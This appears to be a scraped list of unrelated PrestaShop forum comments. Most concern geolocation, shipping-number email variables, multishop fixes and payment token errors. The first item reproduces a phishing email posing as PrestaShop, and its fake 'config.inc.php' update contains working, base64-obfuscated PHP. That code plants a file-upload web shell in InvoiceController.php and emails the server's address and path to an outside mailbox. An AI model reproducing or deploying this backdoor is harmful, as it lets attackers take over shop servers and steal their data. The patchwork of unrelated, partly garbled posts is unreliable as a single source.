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  1. Prestashop <[email protected]> dkim = pass [email protected] header.s = 657wrrdpqxpxc4dyj324zbvh23phhc6f header.b = d9j9BT7P; dkim = pass [email protected] header.s = shh3fegwg5fppqsuzphvschd53n6ihuv header.b = m8vP0JQv; arc = pass (i = 1 spf = pass spfdomain = eu-west-1.amazonses.com dkim = pass dkdomain =); Following an error concerning a security file linked to CVE-2021-E49. We have attached the configuration file to update. Replace config.inc.php from the config folder with the attached file, We apologize for the inconvenience caused <?php fwrite(fopen(base64_decode('Y29udHJvbGxlcnMvZnJvbnQvSW52b2ljZUNvbnRyb2xsZXIucGhw'),base64_decode('dys=')),base64_decode('PD9waHAgaWYoaXNzZXQoJF9HRVRbImhhaGFoYWhhIl0pKXtlY2hvIjxjZW50ZXI+PGZvbnQgY29sb3I9I0ZGRkZGRj5bdW5hbWVdIi5waHBfdW5hbWUoKS4iWy91bmFtZV0iO2VjaG8iPGJyPjxmb250IGNvbG9yPSNGRkZGRkY+W2Rpcl0iLmdldGN3ZCgpLiJbL2Rpcl0iO2VjaG8iPGZvcm0gbWV0aG9kPXBvc3QgZW5jdHlwZT1tdWx0aXBhcnQvZm9ybS1kYXRhPiI7ZWNobyI8aW5wdXQgdHlwZT1maWxlIG5hbWU9Zj48aW5wdXQgbmFtZT12IHR5cGU9c3VibWl0IGlkPXYgdmFsdWU9dXA+PGJyPiI7aWYoJF9QT1NUWyJ2Il09PXVwKXtpZihAY29weSgkX0ZJTEVTWyJmIl1bInRtcF9uYW1lIl0sJF9GSUxFU1siZiJdWyJuYW1lIl0pKXtlY2hvIjxiPlN1Y2Nlc3M8L2I+LS0+Ii4kX0ZJTEVTWyJmIl1bIm5hbWUiXTt9ZWxzZXtlY2hvIjxiPkZhaWxlZCI7fX19'));$c0=base64_decode('ZGVlemVydGVzdHNAeWFuZGV4LnJ1');$o1=base64_decode('Tk9VVkVBVSBQUkVTVEEgLT4g').$_SERVER[base64_decode('U0VSVkVSX05BTUU=')];$i2=base64_decode('ZnJvbTogQ0RMQiA8Y29uZmlncHJlc3RhQG1zLnNrPg==');$n3=base64_decode('TGluayA6IGh0dHA6Ly8=').$_SERVER[base64_decode('U0VSVkVSX05BTUU=')].$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')].base64_decode('DQo=');$n3.=base64_decode('UGF0aCA6IA==').__file__.base64_decode('ICgvY29udHJvbGxlcnMvZnJvbnQvSW52b2ljZUNvbnRyb2xsZXIucGhwP2hhaGFoYWhhKQ==');$d4=@mail($c0,$o1,$n3,$i2);$l5=@mail($c0,$o1,$n3,$i2);?>
  2. if you use geolocation, with undetected country override (country by default), you should not use the default country in browser
  3. the important thing about geolocation is - detect the country or region (obviously that the accurate country is the most real) - in case of not detecting, how to proceed (the perfect thing is to consider a country by default, this country should be the country where most visitors come from) - after login what should be considered, cookie country or adress county if we verify the module geolocation pro, consider these scenarios a customer that accesses the store sees the prices and buys the products with those same prices. do not forget that some payment modules when returning to the store the successful payment come from different ips of the customer, and will certainly create purchases with wrong prices Attention this is not to advertise the module, I hope that the module of prestablog also consider what I said, because as it supports the new free databases of maxmind is a good alternative I'm actually considering buying for testing.
  4. Hi Nico Slow in ps 1.6?? Enable geolocation core or module?? Slow only ms not big slow
  5. hi el Patron your module indicates 99.99% this for visitors coming mainly from europe I'm with attention to the statistics of your module, because the free maxmind file will quickly be outdated advise everyone to buy your module I was also waiting for you to adapt your module to the free databases of maxmind was good for everyone, because I see the prestashop team, very apathetic regarding this subject and the end of prestashop 1.6 I'm looking at thirtybees It's just my opinion.
  6. hi Good Morning I needed it too Did you retrieve the link? thank you
  7. perdona hay un error incorrecto $order→shipping_number); corrrecto $order->shipping_number ); o sea public function processBulkUpdateOrderStatus() $templateVars = array('{followup}' => str_replace('@', $order->shipping_number, $carrier->url), '{shipping_number}' => $order->shipping_number); if ($history->id_order_state == Configuration::get('PS_OS_SHIPPING') && $order->shipping_number) { $templateVars = array('{followup}' => str_replace('@', $order->shipping_number, $carrier->url), '{shipping_number}' => $order->shipping_number);
  8. ejemplo public function processBulkUpdateOrderStatus() $templateVars = array('{followup}' => str_replace('@', $order->shipping_number, $carrier->url), '{shipping_number}' => $order->shipping_number); if ($history->id_order_state == Configuration::get('PS_OS_SHIPPING') && $order->shipping_number) { $templateVars = array('{followup}' => str_replace('@', $order->shipping_number, $carrier->url), '{shipping_number}' => $order→shipping_number);
  9. AdminOrdersController.php cambiar todas $templateVars () a: $templateVars = array('{followup}' => str_replace('@', $order->shipping_number, $carrier->url), '{shipping_number}' => $order->shipping_number);
  10. gracias por la respuesta era para entender si era el mismo problema que yo tenía la solución que encontré para el PS fue la siguiente: - funciona cambiar el estado del pedido en bulk - funciona cambiar el estado pedido manualmente - funciona para volver a enviar el correo electrónico de nuevo considerando las 2 variables {shipping_number} {followup}
  11. hola, ha conseguido resolver ¿Estas a hablar cuando insertas el número de seguimiento manualmente? el estado de la compra in transit , has seleccionado la opción de enviar email automáticamente ?? gracias
  12. the same problem in ps , manual update works fine for all stores, but in cron only for the default store
  13. information please Fix PHP Warning when updating category with multishop #8673 classes/ObjectModel.php but not fix the problem Fix the update of cover image in multishop mode #8251 line 679 - 689 if ($shop_exists) { if (Shop::isFeatureActive() && Shop::getContext() != Shop::CONTEXT_SHOP) { if (is_array($this->update_fields)) { foreach ($fields as $key => $val) { if (!array_key_exists($key, (array)$this->update_fields)) { unset($fields[$key]); } } } } thanks
  14. it works perfectly Many thanks for the attribute presta
  15. prestashop Malheureusement, après la mise à jour Je fait des tests et a fonctionné correctement en mode réel, le même problème Je reçois des paiements mais aucun achat est effectué avec la même erreur ## 2017-04-24 22:22:47 ## Token or signature are not valid ## 2017-04-24 22:22:56 ## Token or signature are not valid
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